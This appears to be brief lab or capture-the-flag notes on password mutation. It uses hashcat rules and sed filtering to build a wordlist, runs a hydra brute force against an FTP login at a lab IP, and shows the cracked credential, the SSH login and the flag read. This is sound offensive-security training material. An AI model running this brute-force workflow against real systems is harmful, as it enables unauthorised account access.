Password Mutations

June 04, 2024

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
wc mut_password.list

Just removing characters that are 10 or below

sed -ri '/^.{,10}$/d' mut_password.list
wc mut_password.list 

Removing characters that start with a number

sed -ri '/^[0-9]/d' mut_password.list

Remove strings that begin with “a/A” characters.

sed -ri '/^[aA]/d' mut_password.list
wc mut_password.list
hydra -t48 -l sam -P mut_password.list 10.129.146.204 ftp
login: sam   password: B@tm@n2022!
ssh sam@10.129.146.204

locate flag.txt
cat /home/sam/smb/flag.txt

Last updated